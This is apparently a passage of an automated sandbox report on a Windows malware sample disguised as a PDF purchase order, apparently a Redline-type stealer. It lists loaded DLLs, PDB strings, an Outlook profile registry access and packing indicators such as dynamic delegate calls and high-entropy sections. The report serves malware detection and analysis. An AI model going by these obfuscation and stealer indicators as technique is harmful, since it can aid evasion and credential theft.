                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\Locator.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\Locator.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\Locator.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\Locator.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\Locator.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\Locator.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\Locator.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dll
                            Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dll
                            Source: C:\Windows\System32\snmptrap.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeStatic file information: File size 6536429 > 1048576
                            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: microsofts.exe, 00000005.00000003.2814742901.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000004.00000003.2117161798.0000000005820000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: microsofts.exe, 00000005.00000003.2894889964.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2906588524.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2891835295.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: msiexec.pdb source: microsofts.exe, 00000005.00000003.2261668273.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: microsofts.exe, 00000005.00000003.2480516166.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ssh-agent.pdb source: microsofts.exe, 00000005.00000003.2334730630.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: AppVClient.pdb source: microsofts.exe, 00000005.00000003.2165441366.0000000005000000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: microsofts.exe, 00000005.00000003.2617403766.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: microsofts.exe, 00000005.00000003.2617403766.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: msiexec.pdbGCTL source: microsofts.exe, 00000005.00000003.2261668273.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ADelRCP_Exec.pdb source: microsofts.exe, 00000005.00000003.2640650319.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: mavinject32.pdbGCTL source: microsofts.exe, 00000005.00000003.2954719715.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2958576638.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PresentationFontCache.pdb source: microsofts.exe, 00000005.00000003.2212014906.0000000006960000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PerceptionSimulationService.pdb source: microsofts.exe, 00000005.00000003.2272521083.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: _.pdb source: microsofts.exe, 00000005.00000003.2119948725.00000000006E3000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdb source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074787470.0000000004170000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074250734.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2102593621.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2103800748.0000000003F90000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: microsofts.exe, 00000005.00000003.2523798561.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: MsSense.pdbGCTL source: microsofts.exe, 00000005.00000003.2299207011.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: microsofts.exe, 00000005.00000003.2806405530.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: MsSense.pdb source: microsofts.exe, 00000005.00000003.2299207011.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: microsofts.exe, 00000005.00000003.2940771463.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: microsofts.exe, 00000005.00000003.2837407835.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2825064173.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: WmiApSrv.pdbGCTL source: microsofts.exe, 00000005.00000003.2391093241.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: microsofts.exe, 00000005.00000003.2675621901.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: Acrobat_SL.pdb((( source: microsofts.exe, 00000005.00000003.2494651732.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: locator.pdb source: microsofts.exe, 00000005.00000003.2289813880.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2295639551.0000000006910000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: microsofts.exe, 00000005.00000003.2186596905.0000000006950000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ADelRCP_Exec.pdbCC9 source: microsofts.exe, 00000005.00000003.2640650319.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: microsofts.exe, 00000005.00000003.2505449143.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: Acrobat_SL.pdb source: microsofts.exe, 00000005.00000003.2494651732.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: microsofts.exe, 00000005.00000003.2894889964.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2906588524.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2891835295.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: microsofts.exe, 00000005.00000003.2523798561.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: microsofts.exe, 00000005.00000003.2704629556.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: microsofts.exe, 00000005.00000003.2480516166.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: mavinject32.pdb source: microsofts.exe, 00000005.00000003.2954719715.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2958576638.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: maintenanceservice.pdb source: microsofts.exe, 00000005.00000003.2245227049.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: 64BitMAPIBroker.pdb source: microsofts.exe, 00000005.00000003.2787951511.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PerceptionSimulationService.pdbGCTL source: microsofts.exe, 00000005.00000003.2272521083.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: snmptrap.pdbGCTL source: microsofts.exe, 00000005.00000003.2314590976.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: msdtcexe.pdbGCTL source: microsofts.exe, 00000005.00000003.2250623061.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: microsofts.exe, 00000005.00000003.2940771463.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PerfHost.pdbGCTL source: microsofts.exe, 00000005.00000003.2284066039.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2288206191.0000000006910000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2282909180.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: microsofts.exe, 00000005.00000003.2767066626.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: microsofts.exe, 00000005.00000003.2675621901.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: AppVClient.pdbGCTL source: microsofts.exe, 00000005.00000003.2165441366.0000000005000000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: microsofts.exe, 00000005.00000003.2814742901.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: microsofts.exe, 00000005.00000003.2704629556.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: microsofts.exe, 00000005.00000003.2773806278.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PerfHost.pdb source: microsofts.exe, 00000005.00000003.2284066039.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2288206191.0000000006910000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2282909180.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: microsofts.exe, 00000005.00000003.2806405530.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: maintenanceservice.pdb` source: microsofts.exe, 00000005.00000003.2245227049.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: microsofts.exe, 00000005.00000003.2837407835.0000000000590000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2825064173.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdbUGP source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074787470.0000000004170000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000000.00000003.2074250734.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2102593621.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe, 00000003.00000003.2103800748.0000000003F90000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: TieringEngineService.pdb source: microsofts.exe, 00000005.00000003.2343789466.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: TieringEngineService.pdbGCTL source: microsofts.exe, 00000005.00000003.2343789466.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: WmiApSrv.pdb source: microsofts.exe, 00000005.00000003.2391093241.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: microsofts.exe, 00000005.00000003.2718653783.0000000000590000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ALG.pdb source: microsofts.exe, 00000005.00000003.2119381762.00000000050D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: msdtcexe.pdb source: microsofts.exe, 00000005.00000003.2250623061.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: microsofts.exe, 00000005.00000003.2186596905.0000000006950000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ALG.pdbGCTL source: microsofts.exe, 00000005.00000003.2119381762.00000000050D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: microsofts.exe, 00000005.00000003.2212014906.0000000006960000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: locator.pdbGCTL source: microsofts.exe, 00000005.00000003.2289813880.0000000007250000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000005.00000003.2295639551.0000000006910000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: microsofts.exe, 00000005.00000003.2505449143.0000000006940000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: ssh-agent.pdbX source: microsofts.exe, 00000005.00000003.2334730630.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: AppVShNotify.pdb source: microsofts.exe, 00000005.00000003.2932313089.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: snmptrap.pdb source: microsofts.exe, 00000005.00000003.2314590976.0000000007250000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: microsofts.exe, 00000005.00000003.2773806278.00000000008D0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: microsofts.exe, 00000005.00000003.2718653783.0000000000590000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: AppVShNotify.pdbGCTL source: microsofts.exe, 00000005.00000003.2932313089.00000000008D0000.00000004.00001000.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: Native_Redline_BTC.exe.4.dr, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                            Source: 4.2.svchost.exe.6000000.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                            Source: appvcleaner.exe.5.drStatic PE information: 0xBEAF7172 [Mon May 18 10:01:22 2071 UTC]
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
                            Source: PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeStatic PE information: real checksum: 0xa2135 should be: 0x6402d4
                            Source: armsvc.exe.4.drStatic PE information: real checksum: 0x32318 should be: 0x13ed32
                            Source: Native_Redline_BTC.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x9799b
                            Source: armsvc.exe.4.drStatic PE information: section name: .didat
                            Source: Acrobat.exe.5.drStatic PE information: section name: .didat
                            Source: private_browsing.exe.5.drStatic PE information: section name: .00cfg
                            Source: private_browsing.exe.5.drStatic PE information: section name: .voltbl
                            Source: updater.exe.5.drStatic PE information: section name: .00cfg
                            Source: updater.exe.5.drStatic PE information: section name: .voltbl
                            Source: updater.exe.5.drStatic PE information: section name: _RDATA
                            Source: setup.exe.5.drStatic PE information: section name: .didat
                            Source: setup.exe.5.drStatic PE information: section name: _RDATA
                            Source: IntegratedOffice.exe.5.drStatic PE information: section name: .didat
                            Source: IntegratedOffice.exe.5.drStatic PE information: section name: _RDATA
                            Source: OfficeC2RClient.exe.5.drStatic PE information: section name: .didat
                            Source: OfficeC2RClient.exe.5.drStatic PE information: section name: .detourc
                            Source: officesvcmgr.exe.5.drStatic PE information: section name: .didat
                            Source: alg.exe.5.drStatic PE information: section name: .didat
                            Source: chrome_pwa_launcher.exe.5.drStatic PE information: section name: .00cfg
                            Source: chrome_pwa_launcher.exe.5.drStatic PE information: section name: .gxfg
                            Source: chrome_pwa_launcher.exe.5.drStatic PE information: section name: .retplne
                            Source: chrome_pwa_launcher.exe.5.drStatic PE information: section name: LZMADEC
                            Source: chrome_pwa_launcher.exe.5.drStatic PE information: section name: _RDATA
                            Source: chrome_pwa_launcher.exe.5.drStatic PE information: section name: malloc_h
                            Source: chrmstp.exe.5.drStatic PE information: section name: .00cfg
                            Source: chrmstp.exe.5.drStatic PE information: section name: .gxfg
                            Source: chrmstp.exe.5.drStatic PE information: section name: .retplne
                            Source: chrmstp.exe.5.drStatic PE information: section name: CPADinfo
                            Source: chrmstp.exe.5.drStatic PE information: section name: LZMADEC
                            Source: chrmstp.exe.5.drStatic PE information: section name: _RDATA
                            Source: chrmstp.exe.5.drStatic PE information: section name: malloc_h
                            Source: GoogleCrashHandler64.exe.5.drStatic PE information: section name: _RDATA
                            Source: GoogleCrashHandler64.exe.5.drStatic PE information: section name: .gxfg
                            Source: GoogleCrashHandler64.exe.5.drStatic PE information: section name: .gehcont
                            Source: FXSSVC.exe.5.drStatic PE information: section name: .didat
                            Source: GoogleUpdateComRegisterShell64.exe.5.drStatic PE information: section name: _RDATA
                            Source: GoogleUpdateComRegisterShell64.exe.5.drStatic PE information: section name: .gxfg
                            Source: GoogleUpdateComRegisterShell64.exe.5.drStatic PE information: section name: .gehcont
                            Source: 117.0.5938.132_chrome_installer.exe.5.drStatic PE information: section name: .00cfg
                            Source: 117.0.5938.132_chrome_installer.exe.5.drStatic PE information: section name: .retplne
                            Source: elevation_service.exe.5.drStatic PE information: section name: .00cfg
                            Source: elevation_service.exe.5.drStatic PE information: section name: .gxfg
                            Source: elevation_service.exe.5.drStatic PE information: section name: .retplne
                            Source: elevation_service.exe.5.drStatic PE information: section name: _RDATA
                            Source: elevation_service.exe.5.drStatic PE information: section name: malloc_h
                            Source: elevation_service.exe0.5.drStatic PE information: section name: .00cfg
                            Source: elevation_service.exe0.5.drStatic PE information: section name: .gxfg
                            Source: elevation_service.exe0.5.drStatic PE information: section name: .retplne
                            Source: elevation_service.exe0.5.drStatic PE information: section name: _RDATA
                            Source: elevation_service.exe0.5.drStatic PE information: section name: malloc_h
                            Source: maintenanceservice.exe.5.drStatic PE information: section name: .00cfg
                            Source: maintenanceservice.exe.5.drStatic PE information: section name: .voltbl
                            Source: maintenanceservice.exe.5.drStatic PE information: section name: _RDATA
                            Source: msdtc.exe.5.drStatic PE information: section name: .didat
                            Source: msiexec.exe.5.drStatic PE information: section name: .didat
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004171D1 push ecx; ret 3_2_004171E4
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_0049671B pushad ; iretd 3_2_0049671D
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00493419 push edx; iretd 4_2_0049341B
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00492A2E push edi; iretd 4_2_00492A38
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00491C8C push cs; iretd 4_2_00491C8D
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00491B79 push FFFFFF87h; retf 4_2_00491B7C
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00495B0C pushfd ; iretd 4_2_00495B0D
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF7DF0 push 04AF7D4Bh; ret 4_2_04AF7D80
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF7DF0 push 04AF7DD7h; ret 4_2_04AF7D9F
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF7DF0 push 04AF7D5Fh; ret 4_2_04AF7DB3
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF7DF0 push 04AF81E6h; ret 4_2_04AF7E2D
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF7DF0 push 04AF7FCCh; ret 4_2_04AF82BB
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF7DF0 push 04AF8468h; ret 4_2_04AF852D
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF852Eh; ret 4_2_04AF7F3A
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF8514h; ret 4_2_04AF7F66
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF7E66h; ret 4_2_04AF8057
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF817Ah; ret 4_2_04AF808B
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF82E5h; ret 4_2_04AF80D9
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF826Ah; ret 4_2_04AF819E
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF849Ch; ret 4_2_04AF81E4
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF805Ch; ret 4_2_04AF8255
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF8321h; ret 4_2_04AF82E0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF7FBFh; ret 4_2_04AF831F
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF7FA8h; ret 4_2_04AF834C
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF84BAh; ret 4_2_04AF83E2
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF8426h; ret 4_2_04AF84D8
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF8075h; ret 4_2_04AF84FD
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF808Ch; ret 4_2_04AF8512
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF8B6Fh; ret 4_2_04AF8596
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AF8550 push 04AF8E94h; ret 4_2_04AF85C9
                            Source: Native_Redline_BTC.exe.4.drStatic PE information: section name: .text entropy: 7.954598996291746
                            Source: Acrobat.exe.5.drStatic PE information: section name: .reloc entropy: 7.8576184835751715
                            Source: Aut2exe.exe.5.drStatic PE information: section name: .rsrc entropy: 7.800635454777948
                            Source: Aut2exe_x64.exe.5.drStatic PE information: section name: .rsrc entropy: 7.800488144393949
                            Source: setup.exe.5.drStatic PE information: section name: .rsrc entropy: 7.6446905292307115
                            Source: AutoIt3_x64.exe.5.drStatic PE information: section name: .reloc entropy: 7.943916918732901
                            Source: appvcleaner.exe.5.drStatic PE information: section name: .reloc entropy: 7.9356357834661635
                            Source: SciTE.exe.5.drStatic PE information: section name: .reloc entropy: 7.912295186276781
                            Source: IntegratedOffice.exe.5.drStatic PE information: section name: .reloc entropy: 7.926760749697762
                            Source: OfficeC2RClient.exe.5.drStatic PE information: section name: .reloc entropy: 7.71655749372354
                            Source: officesvcmgr.exe.5.drStatic PE information: section name: .reloc entropy: 7.937217171394089
                            Source: chrome_pwa_launcher.exe.5.drStatic PE information: section name: .reloc entropy: 7.9405684282494935
